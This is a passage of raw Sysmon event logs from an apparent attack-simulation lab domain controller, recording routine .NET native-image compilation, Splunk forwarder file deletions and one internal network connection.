YSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.400{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.400{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:36.275{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15b8-0\System.Windows.Controls.Ribbon.dll2021-06-23 21:06:36.275 23542300x800000000000000022126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EDBD25B31FB886D1E665E2545902E2E,SHA256=C08917DF3184F039A626200D1AE9F9F2A23798850E209E6E4652BCBB847EE73D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:37.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFEBD078DB95D2DD07F9731F3A411E09,SHA256=F776E4092F2847B4801BDFD7C3205607E879691170941B9CC91E3B17E24AB6C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:37.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FDBDF87B965D68309E06EDC369B6C5,SHA256=A98DCAC6BBA07D59017044CF27B199A39B507BFCF075A53C352016BFFEBE37BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.963{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.963{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.916{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1898-0\System.Windows.Input.Manipulations.dll2021-06-23 21:06:38.916 10341000x800000000000000022151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.807{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.807{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.807{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.760{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.744{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.744{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.697{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D48152854AB964FAE27DDEE944A8641,SHA256=3250D5CDAED4AF97EBD5904F9CA581592C64700EA69671FE92D2D64AE162F2D3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.666{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\efc-0\System.Windows.Forms.DataVisualization.Design.dll2021-06-23 21:06:38.666 10341000x800000000000000022143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.510{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.494{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.494{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.385{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.385{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.135{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1568-0\System.Windows.Forms.DataVisualization.dll2021-06-23 21:06:38.135 23542300x800000000000000022169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.729{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FAE890521E94B2829DC2D47BA3B727,SHA256=6DC8E831ADE5D6366DB30F3606094247EBC3761B28052F74A2383EDC15154D26,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.299{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61453-false10.0.1.12-8000- 23542300x800000000000000022167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.385{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBE5C2587D955BAC6D629F1ECBA61C86,SHA256=A0C40A823A845D17EA06013D27E22024241D6027D9CE487A00F5F9F9E365E35E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.353{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.338{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 